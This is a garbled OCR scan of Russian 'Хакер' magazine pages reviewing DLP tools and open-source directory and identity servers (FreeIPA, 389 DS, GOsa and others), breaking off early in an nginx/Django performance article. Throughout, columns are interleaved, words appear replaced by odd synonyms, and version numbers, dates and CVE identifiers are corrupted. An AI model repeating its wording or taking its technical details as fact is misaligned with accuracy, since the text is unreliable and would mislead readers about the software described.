соз выделять политики пользу кого любого вида траф ика: веб-трафика,

помогите т а вление списков

Postfix, MS Exchange, соединение со Zimbгa; ACL получи и распишись ос нове IР -адресов равным образом шаблонов.

трафика соцсетей, файлового, почтов ого равным образом !М-трафика. Распозна­ ются от инхронизации из мобильными устройствами : ActiveSyпc,

Palm

MS

HotS yпc равно iTuпes. В сегодняшнее миг на офици ­

альных из 3 сках н ет поддержки Р2Р равным образом

MyDLP умеет

обнар у живать да разверзать зашиф­

Функ ционально система, n остроенная бери

Skype.

Возможно эксплуатнуть добавочный элемент полно­

текстового п оиска

К кашаса е того ,

р ов анные файлы сиречь файлы, закрытые паролем [если убирать ключ!.

Devicelock Seaгch Sегvег [DLSSI, тот или другой

MyDLP,

состоит с четы­

рех ко мпонентов:

MyDLP Netwoгk -сетевой сервер ,

которой исnользуе т ся к

находит информацию на теневы х ко пия х равно журналах. Управление

nерехвата ТСР-соединений равно является базисный для того

производится около помощи гр у пповы х политзаключенный домена, поэто­

Написан возьми E гlang да

му клиенты бессознательно п одх ватывают установки. Правил а

со равно стеме, поддерживающей интерпретаторы.

создаются помощью вычитчик

На не без; л учай отсутствия

De vice lock

De vicelock GгoupPo l icy Мапаgег. Active Diгectoг y предусмотрена балка

Епtегргisе Manageг, со nо собная nолучать способности

изо любых LDАР-каталогов, на рента

Console

Python,

MyDLP.

можетбытьустановлен получай какой угодно

MyDLP Endp oint - aгeнт, заводимый в конечных системах WinXP -S e7en l, nозволяет кон­

[поддерживаются 02/64 - битные

тролирова т ь до сей времени критические операции : коnирование файлов,

De vicelock Management

отображается тек у ще е sos тояни е агентов. Такж е кли­

nечать, зажим экрана, добыча nрав администратора равно т .

MyDLP Secuгity Monitoг- монитор,

n.

отслеживающий, кто такой да какие

е нты могут хайло навливаться со еще nрек онфигурирова нны ми

способности использует.

nараметрам и.

MyDLPWeb Ul-инструментуnравления настройками Netwoгk и Endpoint, которые подчас nодключаются ко Web Ul, nо­

MYDLP COMMUNITY EDITION

л у чают последниеустановки да сбрасывают лог. Написан возьми РНР и

Сайт проекта :

mydlp.orq. Лицензия: GNU GPL. ОС сервер: Ubuntu 00.04 LTS. ОС клиенты: Windows ХР, Vista, 0 (x86/x64l.

безграмотный вызывает. Девиз

Бесnл~тная DLР-си со проблематика [разработчики расшифровывают

MyDLP.

Data Loss Pгe vent ionl вместе с отк рытым исходным

ко дом, включающая галерея функций на пр едотвращения прибыль

жайших nланах- POP/ IMAP, MSNMS/Jabbeг равным образом MS Exchangel; анализ документов - txt, MS Woгd/Excei/Poweгpoint 07-2k3, RTF,

ODF, PDF, PostScгipt , XM L, HTML, TAR, GZIP, RAR равно др . ;

равно архивов-ZIР,

0z,

ажно небольшое видео руководство. П осле вслед за n уска клиента во трее

Python-Magic , будто

Ubuntul, представление VMwaгe равно реnозиторий Ubuntu 00.04 LTS [downloads. med гatech.com/ubu ntul. За nлату предлагается Еntегргisе-версия, имеющая расширен­ ные состояние анализа, выправленный интерфейс, каран т ин, функцию

ар х ивирования равным образом обеспечиваемая n оддержкой.

регистрация, блокировка [в nлатной версии Enteгpгi se добавле­ ны а р хи вирование равным образом карантин!; файлов

за МD5-хешу;

018

О реп nолностью насчёт т ражает экстракт

невозможно. Проект предлагает инструктивный 050-образ [на базе

изучение nротоколов- НТТР/ НТТРS , FTP/ FТPS , SMTP, ICAP [в бли­

распознавание М 0М Е-типа согласно данным

Easy, Simple,

Документация проекта охватывает десяток мануалов, сделал т ь

nоявляется значок, сnрятать какой от п омощью штатных средств

данны х:

LibгeOffi ce

настроек да журнала собы т ий исnоль­

Процесс настройки равно подключения клиентов трудностей

Русификация: и помину нет (возможна собственными силами!. эту аббревиатуру наравне

Adobe Flex, с целью хранения MySQL.

зу ется

ЗАКЛЮЧЕНИЕ Нужно помнить, сколько

DLP- сие

nрежде общей сложности инструмент, позво­

ляющий стократ убавить риски, наличествование ко т орого ранее само

откапывание тек не без; та с файловбинарных форматов;

за себя дисциnлинирует сотрудников. Ожидать, что-нибудь имплантация

установление исходного стих [C /Cн/C#/Java/A DA равно др.l; идентификация банковских счетов/кредитных карт, некоторых

такого типа системы гарантированно защитит ото утечек , возникающи х

национальны х идентификационных штукенция ов;

захочет делегировать тож выбросить ценную информацию, возлюбленный мертвяк

на результате умышленных действий, в свою очередь далеко не стоит. Если инсайдер

приложение пользовательски х правил равно регулярных выражений,

найдет род к этого, вследствие чего нужно вдобавок ис n ользовать до сей времени

статистический разложение равно байесовские классификаторы;

традиционные методы защиты . ::х::

ХАКЕР 03 / 058/ 001 0


ПРОДУКТЬI СО ВСЕГО МИРА*

OT&OPHbiE .........,. ......,...

Мы знаем , идеже на мире раскопать самые элита пищевые продукты . Вы знаете, что такое? можете раскопать их рsщом , подо маркой TASH


SYN/ACK

Сергиян gгindeг Яремчук [g г indeг!Osynack.гul

В FгeeiPA прежде вер~:: 2.1.3 включи;ел

дано СSR(СVЕ-

~~11-36361. Для ее т

звимость

__ устранени моя особа следуе обновиться до самого

,

0 04

'' '' '' ''

\ \

'

-

в отношении FгeeiPA

мы

исnользуется А~

аутентификаци

равно авторизац~~t для в решении относительно

виртуализации,

nостроенн~~М . на основе

Инсталляцию

описываемых nродуктов рекомендуется производить на се ч истую »

систему,

ю

отнюдь не выполняющу никаких других

функций .

Для

зации

cинxpsoн~ctive Diгec-

с имо tогу нeoбxo~indows 389D

определить

Sync. После установки

оnакета 089-dsдля 389DS конфигура~;ситить

необходимо следовать

setupadmin.pl. скриnт

ница Red Hat Стра IРА- ге dhat __ .com/

I!J:.Q.IIl.QLiм.

• Утилита sys.t~m­ config-autentofo;я

cation, Сайт nрое_кта Fгeei­

PA- ~.

ds-

входящ

Fedora,

во сосрт~вит вкладку, соде ю nозволяющу

Страница Mandгi~

Diгectoгy S~г:":гq.

mds mandr1y_._

020

активировать ию тентификац

:~рез FгeeiPA.

ХАКЕР

03/158/2012


Корпоративные отношения

GOSll • ~oJIII flleJ;dot~НIIt OIYAookmПJ

+

· С

А

~Istltlp

{lp61111

.III'I.Q

0,11!115111\М

/:IS.Yptol ll

00..

\1MCl'l)yl4etlt ЬI

мо~Ш;~ f(r~fox

!;П~IQ

• )

~ccp·U121 .o.o. ~'"'

• o l "'· ~:.~с:. ----,_, 0.

-~~1 Gon14110

*'·'

<* мandriva

е А WlleOiмtoGOP

!!1!1.1

---

Adm!nlslrм!on

_

Ноше

User.groupand computer

SAMBAseNice

Nelwork

Mallservice

: !!iЪ••••_. : :11!11.

: м=-

: ~

f&.

.

managemenl

managemenl

EFI!

~~~

....

~ ~ ::...t~~OЦII _klop _ _ ",...

ca.ror ~«es• 00 GOu

:а=:...-::

......

-·-

Co<>t>t.~!I-I)'Pol"d ~UIO .... f<,ed

.

,,_ Pr...,_" v

..,."

.--

Ц~К~М~''""11-

_,....,pl..."

Mandriva Management Console nроста равно

089

~-..-

М..,.IIЦ'IQ~di-U!

DIRECТORY

nонятна во работе

SERVER

Разработчики отмечают высок у ю коэффициент полезного действия да мас­ штабируемость

directory.fedoraproject.orq . Лицензия: GNU GPL. ОС: Fedora/Red Hat/CentOS, склифосовский подвизаться на Linux (Deblan, Ubuntu, Gentoo), Solaris, HP/UX 01, lrix, AIX, Windows равным образом OSF/1 . обществом возле спонсорской поддержке

0996

годы

Red Hat. Базой для Netscape Оiгес tогу

одной мережа может заниматься предварительно четырех

конфликтов, балансировкой н агрузки равно резервированием сервера . Поддерживаются работающие на режиме геаd-опlу сервера, некий аналог

него

Read

Опlу Oomaiп Сопtгоllег во

Active

Оiгесtогу

Win2k8 .

В нынешнее эпоха расчёт торжественно предлагает репази­

тарий равно пакеты с целью RHEL/Fedoгa [подходят равно пользу кого Ceпt05l. Кроме того, возможна сборка на других Liпux [ О еЬiап, Ubuntu, Gentool, 5olaгis, HP/UX 01. Некоторые версии поддерживаюттакже Windows, lгix , AIX да 05 F/ 0. Однако развивание да последующая подмога

0егvег.

Он получил новое имя- F edoгa Оiгесtогу 0егvег- за того,

Red Hat. В 0009 году 389 Оiгесtогу 0егvег [389 согласно номеру порта службы LOAPI. Причина проста: F05 неразрывно 2005

08905 . В

равноправных мастер-серверов не без; автоматическим разрешением

Сервер каталогов уровня предприятия, создаваемый со­

что компетенция нате него во

:!OQ2-20U~I~-GOiLG0нZ.7l

GOsa nозволяет уnравлять учетными заnисями *nix равным образом сервисами

Сайт проекта:

послужил разрабатываемый не без;

е

году приобрела

цель снова-здорово изменил обозначение в

на << неофициальных>> системах требует ото админа поуже некоторой

ассоциировался со Fedoгa, что, сообразно мнению разработчиков, тормо­

подготовки.

зило развитие, во частности интеграцию во часть дистрибутивы.

Компоненты

На основе

08905 Red Hat выпустила коммерческую версию Red Ha t Оiгесtогу 0егvег [R H0 01 со техподдержкой 04/7. Возможности 089 05 включают полную поддержку пр отокола LDAPv3, 05 L/ТL5 - да 0А5 L­

08905

выпускаются соответственно лицензии

GNU GPL,

так сер­

вер базируется возьми ряде продуктов из другими лицензиями IMPL/ LGPL/GPL/XI. Стоиттакже отметить, зачем 089 05 является sos т авной частью F гee iPA- централизованного решения пользу кого управления

аутентификацию, синхронизацию данных [пользователь, группа,

информацией относительно nользователях да политиках равно ради аудита. Речь об

танцевальный шаг роль) от

этом продукте пойдет крохотку ниже.

Active Оiгесtогу [при условии, зачем получи КД Win2k3/2k8 установлен составная часть Windows 0yncl, дифференцирование доступа впло ть до самого отдель н ых а три бутов [и мя, гр уппа, IP равным образом т. д .l В качестве криптадвижка используется публичка N55 ото Mozilla Pгoject. Конструктивно 08905 состоит изо сервера каталогов [Саге Оiгесtогу 5егvег, СО51 равным образом сервера администрирования [Admin 0егvегl. Задача последнего- руководство всеми доступными С О5 , ради зачем пред­

MANDRIVA DIRECTORY SERVER Сайт проекта:

mds.mandriva.orq . GNU GPL. Дистрибутивы: Mandriva, Deblan/Ubuntu, CentOS/RHEL/Fedora, openSUSE, символ VMware. Лицензия:

Сервер Maпdгiva Оiгесtогу 0егvег [М О5 0 - простое во использо ­

лагается графическая выступ [389-coпsolel да утилиты командной строки. В

Linux модильон устанавливается автоматично [написана на Javal. Для управления из-под Win2k3/2k8 бери сайте проекта сле­ дует скача ть программа Windows Console.

вании решение, nозволяющее около помощи наглядного интерфейса уnравлять учетными записями пользователей да груnп, доступом

да сетевыми сервисам равно . П об сути, сие удовлетворительно обная ют надо

FUSIONDIRECTORY Поскольку дорога ко исходному коду

GOsa

намерение для того управления, имеющее паче

Четко определен инвентарь поддерживаемых

удобные инструменты интересах разработки,

дистрибутивов (DeЬian, CeпtOS

так равно повысить качество документацию .

0/RHEL 0, Fedoгa 14/15, openSUSE 01.3/11 .4, SLES 011, и, главное,

приняли намерение в отношении создании сильнее

В октябре 0011-го вышла трансформация FusionDiгec­

интересах каждого с них создан репозиторий ,

открытого да вполне поддерживаемого

toгy

сообществом фор ка с целью привлечения

началась нимало недавно, в рассуждении каких -то особых

сторонних специалистов, а опять же обеспечения

функциональных отличиях с

чтобы тех, который безграмотный имеет связи ко компании

Gonicus GmbH,

был затруднен, разработчики

0.0.2, но,

круглым счетом в духе действие по-над nроектом

GOsa

все еще

обеспечивающий простую установку. Еще одно медаль заключается в с соблюдением всех формальностей поддерживаемых веб­

условий с целью написания плагинов перед большее

базарить никак не nриходится. Документация , по мнению сути,

серверах. Разработчики nредлагают готовые

величина приложений. Новый чтение

состоит с испарения руководств, но, учитывая

конфигурационные файлы к

получил номинация FusioпDiгectoгy ( fusiondiгec­

матрилинейность из

да

GOsa,

для стадии ознакомления

Lighttpd,

Apache2

возможна да схема

toгy. org l . Разработчики обещали никак не лишь

от FusionDiгectoгy не возбраняется эксплуатнуть

получи пgiпх , хотя настройки придется творить

разбудить самое <<м ощное равным образом универсальное >>

документацию для материнский проект.

самостоятельно.

ХАКЕР

03/158/2012

021


SYN/ACK

f1\e Edit V\tw SNrth

~nll

~

Не1р

~~ -

х ~~-

х

~ed:n:-

(root@fedora - )# ipa user - show vpupkin - -att

Console

dn: uid=vpupkin, cn=users, cn=accounts, dc::locat Useг

togin : vpupkin

first name: Vasja

Last na111e : Pupkin Full na11e: Vasja Pupkin Disptay name: vasja Pupkin Initiats: VP Home directory: /home/vpupkin GECOS fietd: vpupkin Login shel t :· / Ьin / sh Keгberos princi pa t: vpupkin@LOCAL UID : 0989288883 GIO : 0989288883

Account disabled : Fatse Hember of groups: ipausers ipauniqueid : 0dc4c446 - 02eЗ - lleB - a2d4 - B88c29f9bc76 krbext radata : AAgBAA=, AAL8vaBNcat9vdC9hZGlpbkBНТ8NBTAAж

- - г. ~ .-----

krЫastpwdchange:

08118469281326Z krbpa s swordexpiration : 08118489281326Z krbpwdpo\icyreference: cn::global_ policy, cn::LOCAL , cn : keгberos , dc::::locat mepmanagedent ry : cn:avpupkin, cn:::groups , cn=account s , dc=t ocat objectcta ss: top , pers on , organizationatperson, inetorgperson , inetuser, posixaccount , krbpr i nc i pa taux , krbt ic ketpoticyaux , ipaobj ect, ( root@fedora -

TroQ~......w;,;- -

~~e~O riginEntry

Для настройки

FreeiPA позволительно

LDAP- OpenLDAP,

Консоль управления

истощить балка

ежели и возможна равным образом совместная эксплуатация из

08905.

Active

089 Directory Server

Diгectoгy да позволяющей централизованно заправлять аутен­

Функционально может выстуnать на качестве РОС !уровня Windows NT41, LDAP-cepвepa вместе с синхронизацией учетных заnисей да nар а ­

тификацией пользователей, устанавли на ать политики дост упа равно ау­

лей, nолностью заместить

проектов, таких в духе дистрибутив F edoгa,

D iгectoгy либо интегрироваться

дита. Фактически FгeeiPA- сие сожительство неск ольких опенсорсных

КегЬегоs равным образом может состоять исnользован в целях организации однократ утнапиштим

08905, MIT КегЬегоs, NTP BIND. На этом проекте, развиваемом быть финансовой подд ержке Red Hat, основан используемый на коммерческом дистриб утиве продукт IPA, тот или другой Red Hat до ста самовила общественности летом 2008 года. Впервые шифр FгeeiPA п оявился на составе Fedoгa 0 lмай 0008гоl, всё же нормальная синхронизирование со Active Diгectoгy бери оный

аутентификации 05501. Разграничени е вплоть до сту nа пользу кого объектов уста­

секунда снова безвыгодный была реализована. На первых порах клиенты

навливается вnлоть накануне отдельных атрибутов: пользователь, гр уnпа,

могли пристраиваться вручную, же сие было неудобно. В октябре

IР-адрес, времена равным образом т. д.

0009-го началась занятие надо нов ой веткой

Active

на нее. Клиентскими ОС могут предназначаться

05 Х. Интерфейс nозволяет nр оизводить настройку аккаунтов равным образом ACL в 0amba, приводить совмес тным достуnом, nечатью получи базе CUP5, доставкой nочты IPostfixl, настроить 0quid равным образом службы DN5/ DHCP, а дми нистрировать уче тные заnиси GLPI. Па кет включает Windows, Linux

равно Мае

Особенно nриятно, что такое? проблемы, преследовавшие компанию Mandгiva, отнюдь не затронули

MD5

равным образом nродукт nостоянно развивается.

равно

0.0. Ее

финальная

вариация была предо ста вл ена на конце марта 0011-го. День , во который был анонсирован релиз, запомнился многим пользователям

В последних версиях для указанным возможностям добавилось

в духе << F edoгa

у дуумвират учетными записями системы Zaгafa, обеспечивающей

FгeeiPA2. В сегодняшнее времена реализованы:

05 Test Da y»,

Linux

отданный не который иное тестированию

совместную работу, централизованное прятание nубличных клю­

централизованное господство учетными записями п ользо ват е­

откуда

лей, групп, компьютеро на да сер ви сов;

Open5SH , аудит,

политики паролей равным образом многое другое. Модульная

застывшая музыка nозволяет прибавлять нужную функциональность alias

отдел дост упом для приложениям, устано вка политический деятель шаг ро­

удалять изо интерфейса лишнее.

лей да настроек КегЬегоs, управле ние правилами

MD5 несомненно

масштабируется, под­

держивая изрядно тысяч заnисей бери что касается дин сер во ер. Неn осредстве нно с целью уп равления сервисами предназначен

Host Based Access Соntгоl-управление равно запасание ролей в LDAP; служба у правления сер тификатами IDogtag Ceгtificate 0егvегl.

устройство ММС

обмена

agent, нарисованный получи Pytho n равно равным образом вместе с nоль зую щий для да нными XM L-RPC. Агенты настраиваются близ помощи

весть nростого на исnользовании веб-интерфейса ММС IMandгiva Management Consolel. Администратор может выкроить одиночный с двух режимов отображения: Noгmal либо — либо Ехрегt. В различие с

08905,

0UDO;

отожествление КегЬегоsдля пользователей да узлов;

Сеть, построенная от применением FгeeiPA , функционально мо­ жет пребывать изо трех типов систем : одного иначе нескольких серве ­

пакеты nредлагаются безвыгодный всего только к «род­

ного » дистрибутива: перевода нет собственноличный репозиторий

Debian,

ров, клиентских машин равно компьютера администратора. По следний, по сути, представляет на вывеску обыдённый абонентный мол сктоп вместе с кон­

сборки в целях Cent05/RHEL/Fedoгa равным образом open5U5E, а тоже сделанный

сольными утилитами интересах удален ного уп равления FгeeiPA !кстати,

образ-складень VMwaгe. Таким образом, серверную кусок

проэксплуатировать их нисколько невыгодный кровь из носу - тотально позволено быть

MD5

позволительно отно ­

сительно бурно равным образом не принимая во внимание nроблем найти во всякий *niх-системе.

веб-интерфейсом, который-нибудь написан получай

Продукт включен на ряд nоставки Mandгiva Ent eгpгise 0егvег.

MD5

nредставляет на лицо самое простое на установке да конфигури­

Ja val.

Чтобы прибавить нагр узку возьми канал, заборщик использует локаль­

ный кеш ILDB да XM LI, получая с него настройки во книга числе равным образом подле

ровании решение, освещенное во нашем обзоре, все самос тоя­

отсутствии доступа для серверу. На клиентской системе устанавли­

тельная компоновка держи других системах, опричь МЕ5, за всем тем требует

шибко подробна равно nозволяет разобраться умереть и безграмотный встать всех его нюансах.

вается ходатай управления аутентификацией 0550 l5ystem 0ecuгity 5eгvices Daemonl . Клиентская порцион реализована малограмотный лишь только для Red H at/Fedo гa равно клонов, однако да про др у ги х ОС равно платформ: AIX,

iid!I!IIЩ

движение ке т ов про

Сайт проекта:

их

некоторых навы засада соответственно работе из

LDAP.

Док уме нтация проекта

freeipa .orq . GNU GPL. Дистрибутивы: сервер- Fedora/CentOS, клиент- Linux, AIX, HPUX, Solaris, openSUSE. Цель проекта Fг eei PA IFгee ldentity, Policy and Auditl- созда­ Лицензия :

ние чтобы L iпuх-систем среды, представляющей лицом альтернативу

022

open5U5E. Что интересно, надо сборкой клиентских Ubuntu/Debian ll aunchpad.net/fгee i pa l равным образом обесnечением совместимости работают двуха сотрудника Red Hat.

HP-UX,

0olaгis,

Сnециальное nриложение lceгtmongeгl у nрощает создание сер тифи катов равно уnравление ими, машинально генерир уя равно nо­ лучая новоявленный цертификат до истечении срока образ действий устарело г о. Опционально возможна слитие от DN5-сервером получи и распишись базе

!нужен nлагин

BIND LDAP BIND из динамическим обновлением посредством

ХАКЕР

03/158/2012


Корпоративные своя рука

Alltlwntkatlon Conflguratlon l l ldont;ty & Authontkot;on Us~r

lдdv•ncod Opt;on•J

АРАСНЕ

Account Conflguratlon

0 LDAP Free iPA 1

Softwaгe

Confl gur.~tion

( diгectoгy .

nоддерживает LDAPvЗ, КегЬегоs да

.

·d

J

~~

Linu x, Windows

да Мае

05

Х , исходные

ADS для любой Java . возможностей LDAP,

тексты nозволяют сосредоточить

Java, Change

системе , с целью которой имеется Кроме стандартных

Passwoгd Pгotocol . Позиционируется как бы

реализованы хранимые процедуры , триггеры,

встраиваемое во иные Jаvа-nриложения

динамические объекты

решение, одначе ни одна душа далеко не заnрещает

другое. Распространяется лещадь лицензией

эксплуатнуть его автономно . Обеспечивает

Apache . В рамках nроекта разрабатывается Apache Diгectoгy Studio, включающий

совершение

~

Foundation

apache . oгg ). Полностью наnисан получи и распишись

Winblnd

Authentic111tion Method:

во

Сервер каталогов, разрабатываемый

Apache

NIS

Authentication

DIRECTORY SERVER

Loc111L accounts onty

User Account Dat111base:

LDAP

равным образом КегЬегоs , возможна

Java

да многое

отпуск поддержки любого протокола .

LDАР - браузер, браузер вместе с х ем, редакторы

Продукт мультиnлатформенный . На сайте

LDIF

проекта достуnны nакеты про установки

администрирования.

равным образом

DSML,

клиентские программы пользу кого

Менеджер аутентификации во Fedora позволяет подобрать FreeiPA

GSS-TSIG ]. При у правл ении комnьютерами да группами компьюте­ ров власть подтверждаются быть п омо щ равно Ке гЬ е г оs keytab иначе

ет уп равлять регистрация ны ми вслед п ис ями

сертификата.

телей равно групп, компьютерами, списками рассылок, приложениями,

Модульная архитек т у ра серверной равным образом клиентской части по­

середина уп равления всей ИТ-инфрастр у ктурой . Интерфейс позволя ­

*nix

да

настройками основных се тевы х служб :

Samba , правами

DHCP, DNS, НТТР, SMT P Gonicus GmbH ,

зволяет не принимая во внимание особых проблем интегриро на ать FгeeiPA равно какой приглянется

равным образом т. д . Итиль зработка вед ется по-под эгидой компании

продукт. В сегодняшний день сезон политики ис п ользуются во фолиант числе

ко от раиса использует

GOsa

п ользова­

во своих сервисах.

равно настройкам рабочего стола. По ка реализо ваны н е безвыездно функции

Все функции вын есе ны во плагины [принциn «о дин сервис= о дин плагин »], позтом у админ собирает конфигурацию на соо твет­

упра вления политиками , аудита равным образом контроля, которые пл анируется

ствии со своими н полоз дами.

равным образом в целях хра нения близнецы мет траншея д ос т у танцевальный шаг ко локальным прилож ениям

В нынешнее сезон реализо ван касательно сильнее

аннексировать во проект.

Н е т н астроек правил

SELinu x,

около держки

централизованно г относительно управления ключами

Samba, Fгe eRA DIUS , SSH да LVM, ОТРи многого

другого. Очевидный недоработка проду для та- поляризованность на пер­ вую касательно ч ередь бери производные насчёт т

Red Hat дистриб ути ваш брат .

Устано крутить

сервер н ую ч асть Fг ee iPA не грех изо репозиториев F e d oгa,

K12LTSP

CentOS,

да совмес тимы х не без; ними . Р азработчики сдела ли всё , дай тебе

упрости ть эксплуатация локализации во версии 0.0 [ис польз зеленый тся gettext и UTF8]. В каталоге ins tall / po есть обложка гu.ро, во ко т ором nере ­ веде бери всего лишь малая пай сообщений. Пр оект энергетически развивается, да рядом этом обнаруживаю т ся в отношении шиб­

0.1 .4 устраняет СSRF- уяз вимость [подделка запросов, CVE- 0011-3636].

00

плагинов, обеспе­

чиваю щ их руководство такими сервисам и, равно как

Squ id, Dan sGuaгdi n , Postfix, Couгieг- IM AP, Maildгop , GNARWL, C y гus-SASL , OpenSSL, ISC DHCP, WebDAV, Pu гe FTPd , РРТР, КегЬегоs, Asteгisk, Nag ios, OPSI, Netatalk, FAI, гsyslog, равным образом серверами коллективной работы: SOGo, OpenGгoupwaгe, Kolab, Scalix. При этом совершенно вам ш еуказан ны е nлагины безграмотный обяза тельн что касается д олжны корпеть в одном сервере, неко­ торые с них мож н об устано крутить в отдельные хост ы.

Уче т ные заnиси п ользова телей об ъединяют ся на гр уп пы , для ко т орых назначают ся разрешенные приложения . При создании

н овых аккаунтов применяются шаблоны [админ создает их сам]

ки . П оследний релиз

со прописанными п равами дост упа ко объек т ам . Н абор разреш ен ий

межсайтовых

ACL состоит с вроде , в рассуждении пр е д е ляющего различимость , объектов [поль ­ зова т е л ей/гру пп] равно разреше н ий. Разрешения опре д е ляют однако

ieiN4

на озмож ны е д ейс тв ия: соз д а ни е, крюк л ение, перестановка , чтение,

Сайт проекта: oss.gonicus.de/labs/qosa.

Лицензия:

GOsa -

GNU GPL.

Дистрибутивы: пакеты- Deblan/Ubuntu, RedHat/CentOS/Fedora, openSUSE/SLES, изо исходных текстов- какой приглянется *nix. Пр оект

фанера да т. д.

G0sa2, являющийся

надстройкой д ля nопулярных

единый на нашем обзоре редакция не без; локализо­

ванным интерфейсом у правления. Правда , локализован возлюбленный временно

безвыгодный полностью, н в рассуждении исnользова ни е

gettext

согласно зволяе т около необ хо ди­

мости предпринять сие самостоятельно.

Поддерживает ся губы н овка во любом дистриб у тиве

опенсорсных приложений, предо ставляе т администратору е дины й

Lin ux.

Раз­

работчики рекомендуют DeЬian , по-под какой соз дан один

fjle fdit Yi!:w Hi1tory Aookmarts

IЬols

tlt'IP

репозиторий. Такж е до самого вместе с т у пны пакеты пользу кого Red Ha t/CentOS/ F e d oгa и ope nSUSE/ SLES, но, по образу правил о, разработчики никак не спешат их соби воинство , потому-то вер эти крошку запаздывают. Можно исполь ­ зовать кто хочешь веб - сер вер, по части дн ако важность касательно тдается

да

nginx.

Apache2

Д окумен тация д ос т у пна так ль ко сверху английском да н е п о­

спевает ради развитием проекта, многие моменты отражены на н ей весьма повер х ностно.

ЗАКЛЮЧЕНИЕ Даже невоо руже нн ым глазом видн о, что-нибудь преимущественно многофункцио­ USERS

касательно --

0

нальным инструментом является

GOsa2.

Это вердикт обесnечивает у княжение у ч етными вслед n исями равным образом многочисленными се рвисам и, поддер живает усик тан овку

на потому что льшин стве ди стрибути вов

Linu x,

име е т локализованный

интерфейс. Однако окончате льны й одно изо двух зависит с конкрет н ой Девиз

ldentity Policy Audit xopowo поясняет сущность FreeiPA

ХАКЕР

03 / 058/ 0012

из-за дачи . :х:

023


SYN/ACK

Женюша Зобнин lexecЬit.rul

СОЗДАЕМ ВЫСОКОПРОИЗВОДИТЕЛЬНЫЙ САЙТ С ИСПОЛЬЗОВАНИЕМ

NGINX И DJANGO

При обсуждении высокой производительности веб-приложений в лоб широк невальна приходят такие названия, что

nginx, memcached, еассеlегаtог, hiphop да им подобные . Фактически сие типовой

ассортимент чтобы любого высоконагруженного сайта, написанного вместе с использованием РНР. Но сколько кабы мы хотим получить целое соки с сайта на 121,

Django? ХАКЕР

03/158/ 0012

.


И со пытание нагрузкой

Администрирование

Ojango

доброnожеnо•ет~ 0obnln и]"'он"т~nероп./Вы"т"

Администрирование сайта

·-fu · ~fb

Груrw1Ы

· ~llllb

. · и..е.

РАСПРЕДЕЛЕННЫЙ КЕШ

.. n.

. "' и-..nь

. • И!f.\Ctilllb

СайrЬI

+ Шмф~ фа"n"" со n-OЩ~IO OpenSSL on)'ISII MKOUH/1 М: сео.с •мяео аоот рат•онnаМн . ПOIApaiЛIIIO, OIHfi KII MitТUITO

М: АВВУУ 08::п.лат не: сн ... аJt lнl ~- · в таком случае АО кон ца

T1ogedltems

n-1111 ..

постоянно их адреса вследствие точку со запятой:

М: improw!,..,..rch"""Jine~•nkrng:l'

·~'''

. • ~ rь

+ A;Iбoolr rь

. · ~оЬuеrмть

hey lll ldltv. oax«Ьot.ruowr'llllr

discovef.:iyourV<IЬti .. . М: мноrоуроан• ... нат11жн .,.

011ПИСИ

I'OТOJ'I rt M: ПOJtн or:t • IO

К1теrор.,...

Стандартная админка

Django умеет рассредоточивать кеш в соответствии с нескольким memcachedcepвepaм на автоматическом режиме . Для сего достанет означить

CACHE_BACKEND ; 'memcached://172.19.26.24e:1 0211 ;172.19.26.242:11212; 172.19.26.244:11213/ '

Django

Итак, допустим, да мы не без; тобой собираемся зап у стить новоявленный веб-проект и решили созидать его не без; использованием фреймварка Djaпgo . По­

$ sudo apt-get install nginx memcached python \ python-setuptools mysql-server

чему Ojaпgo? Потому, который симпатия красив, производителен равным образом невероятно Pythoп, воеже максимально выгрузить программ иста. Благодаря

Вместо MySQL можно, несомненно же, определить PostgгeSQL. Django, а в свою очередь uWSGI равным образом pythoп-memcached пишущий сии строки поставим изо репо­

архитектуре модель-вид-контроллер [MVC) да модульном у дизай­

зитария Pythoп .

дружелюбен ко разработчикам. Djaпgo использует всю мощь языка

ну, так лакомиться структуре, построенной с обособленных кирпичиков, Оjапgо-приложения получай изумление просты во конструировании и сопровождении. Система беретка получи и распишись себя

00% работы,

$ sudo easy_install django uwsgi python-memcached

оттого описа­

ние данных, генерация алгоритма их обработки равно отображения пре­ вращается во тривиальную задачу, почасту решаемую во серия

Также нам понадобится кеширующий фреймворк djohnпy-cache, о назначении которого аз многогрешный расскажу позже:

десятков строк стих [например, пользу кого создания простейшего сайта с полноценной веб-админкой хватит писать только сколько-нибудь

строк) . И всё сие сверх уродливого SQL, скрытого через программи со та за классами Pythoп, получай основе которых равно генерируется карта базы данных.

Мы ожидаем, в чем дело? доход короче владеть высокую посещаемость,

$ sudo easy_install djohnny-cache

НАСТРОЙКА NGINX Первым делом настраиваем nginx . Всё согласно стандартной схеме. Бэка­ пим стереотипный конфиг nginx:

благодаря тому нам нужно махом приготовиться до этого времени возможные пути опти­

мизации . Перво-напер изумительный я должны выкроить легкий, борзый ,

$ sudo mv / etc / nginx/{nginx.conf,nginx.conf.old}

годный во настройке да сопровождении веб-сервер. Это, вестимо

же, пginx, некоторый прямо-таки никак не имее т конкурентов до скорости

Создаем новоизобретённый конфиг равно пишем во него следующее:

отдачи контента. Мы откажемся с стандартных конфигураций с касательно всякими громоздкими апачами возьми стороне бэк-энда да будем

пускать в дело пgiпх наравне стержневой веб-сервер [впоследствии такую схему позволено мелочёвка прибавить со через дополнительных серве­

канал равным образом балансировщиков нагрузки). Второй шаг- приговор вопроса насчёт часть , что будут связаны nginx и Djaпgo . Понятно, в чем дело? не чета сумме проэксплуатировать интерфейс

WSGI, сформированный преднамеренно на Python, только автор сих строк должны выбрать правильную реализацию сего интерфейса . Казалось бы, здесь вариант один- mod_wsgi изо комплекта пgiпх, но нате значение

связующего звена в большинстве случаев годится бридж uWSGI [ pгojects.unblt . it/

uwsgi ), кой показывает неизмеримо лучшую производительность при минимальных требованиях ко оперативной памяти [пруфлинк

ради сом никак не во а ющихся : пichol.as/benchmaгk-of-python-web-seгveгs ) . Третий вопрос- кеширование. Ясно, что-то кроме кеш а деньги не обойтись равным образом что-то реализован дьявол бросьте со использованием memcached. Др угое дело, сколько геморрой кешировгния многогранна равным образом ее ре­ шение чрезвычайно завязано получи специфику самого сайта. В статье наша сестра

